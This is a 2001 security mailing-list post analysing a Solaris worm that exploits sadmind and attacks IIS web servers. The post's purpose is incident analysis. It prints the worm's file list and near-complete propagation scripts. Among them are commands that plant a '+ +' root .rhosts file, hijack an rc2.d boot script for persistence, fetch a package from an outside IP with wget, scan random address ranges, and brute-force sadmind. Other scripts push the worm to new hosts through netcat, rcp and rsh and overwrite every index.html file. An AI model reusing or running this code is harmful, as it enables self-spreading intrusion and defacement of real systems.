Security Incidents mailing list archives

Re: httpd and sunrpc probes from 'sunos 5.6' machines

From: Martin Markgraf <mm () RIEN-AG DE>
Date: Tue, 8 May 2001 12:36:57 +0200

Hello,

Brad Doctor wrote:

I've also seen much of the same -- I submitted this to the list over the
weekend, but it apparently never made it there.

Basically, there is a worm process much like Lion, etc. that after compromising
the machine, starts generating IP addresses and going after more.  The exploit
that is being used is some sort of sadmin exploit.  A tell-tale sign is a
root shell open on port 600 (not functional however).  The exploit places it's
contents in /dev/cuc and goes to town with a perl script and a random number
generator.  It also creates a wide-open .rhosts for root.  It also starts
an inetd process with /tmp/.x that has one service, the root shell bound to
it, just like the lion stuff did ala "sh -i", however this shell has no IO
capabilities on Solaris, and is thus useless.  So, much like the other worms,
this one trudges on blindly after cracking a machine that was wide-open to
begin with.  I think the same group wrote this one as well due to it's
similarities in execution and methodology.  It is executing Unicode attacks,
with static HTML in the perl script, typical anti US stuff.


In the last five days or so I have seen about 9 scans for port 111 on a single
machine. Scanning back these hosts has shown that 8 of them are
running under solaris 5.6 and have an open port 600. The root shell on the
machines I have seen was functional if you connect to them with a program
like netcat instead of telnet since a simple "sh -i" does not set appropriate
environment.
The worm itself uses port 600 initial to create a "+ +" .rhosts file in
the root home directory of a new hacked box and than copy itself via
rcp as /tmp/uni.tar to these box.

There ist the filelist of the /tmp/uni.tar that I have found:

drwxr-xr-x 0/1               0 Apr 29 12:55 2001 /dev/cuc/
-rwxr-xr-x 0/1            6556 Apr 26 08:07 2001 /dev/cuc/brute
-rw-r--r-- 0/1              86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt
-rw-r--r-- 0/1             655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt
-rwxr-xr-x 0/1           11828 Apr 25 15:27 2001 /dev/cuc/grabbb
-rw-r--r-- 0/1             151 Apr 26 09:13 2001 /dev/cuc/ranip.pl
-rwxr-xr-x 0/1            1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh
-rwxr-xr-x 0/1           14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc
-rwxr-xr-x 0/1             217 Apr 26 09:59 2001 /dev/cuc/start.sh
-rwxr-xr-x 0/1             566 Apr 27 03:45 2001 /dev/cuc/time.sh
-rw-r--r-- 0/1           67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl
-rwxr-xr-x 0/1             645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh
-rwxr-xr-x 0/1           28620 Apr 26 08:30 2001 /dev/cuc/nc
-rw-r--r-- 0/1             413 Apr 26 11:16 2001 /dev/cuc/index.html
-rwxr-xr-x 0/1          136248 Apr 29 09:20 2001 /dev/cuc/wget

And these are the shell scripts:

cat cmd1.txt
------------
/bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts
exit


cat cmd2.txt
------------
/bin/tar -xvf /tmp/uni.tar
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
/dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz 
http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
/dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
/bin/mkdir /usr/local
/bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local
/bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
exit


cat start.sh
------------
#!/bin/sh
if [ ! -d /dev/cub ]; then
/bin/mkdir /dev/cub
fi
/bin/nohup /dev/cuc/time.sh &
i=1
while [ $i -lt 5 ]
do
/bin/nohup /dev/cuc/sadmin.sh &
/bin/nohup /dev/cuc/uniattack.sh &
i=`/bin/echo "$i+1"|/bin/bc`
done

cat time.sh
-----------
#!/bin/sh
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
while true
do
/bin/sleep 300
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
/bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
process=`/bin/awk '{print $2}' /dev/cub/tmp2`
for p in $process;do
/bin/grep $p /dev/cub/tmp3
if [ $? = 0 ];then
/bin/kill -9 $p
fi
done
/bin/cp /dev/cub/tmp2 /dev/cub/tmp1
i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
if [ $i -gt 2000 ];then
/bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; &
/bin/rm -f /dev/cub/result.txt
fi
done

cat sadmin.sh
-------------
#!/bin/sh
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
/bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
if [ $? = 0 ];then
/dev/cuc/brute 3 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
else
/dev/cuc/brute 4 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
fi
fi
fi
/bin/rm -f /dev/cub/$i.rpc.txt
done
/bin/rm -f /dev/cub/$i.txt
done

cat uniattack.sh
----------------
#!/bin/sh
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
done
rm -f /dev/cub/$i.txt


regards,
  Martin

--
Martin Markgraf
Rien Informationssysteme AG                         fon: +49 2841 9083061
Eurotec-Ring 15                                     fax: +49 2841 9083069
D-47445 Moers            http://www.rien-ag.de          mm () rien-ag de

Current thread:

httpd and sunrpc probes from 'sunos 5.6' machines Hannu Liljemark (May 07)
- Re: httpd and sunrpc probes from 'sunos 5.6' machines Brad Doctor (May 07)
  - Re: httpd and sunrpc probes from 'sunos 5.6' machines Martin Markgraf (May 10)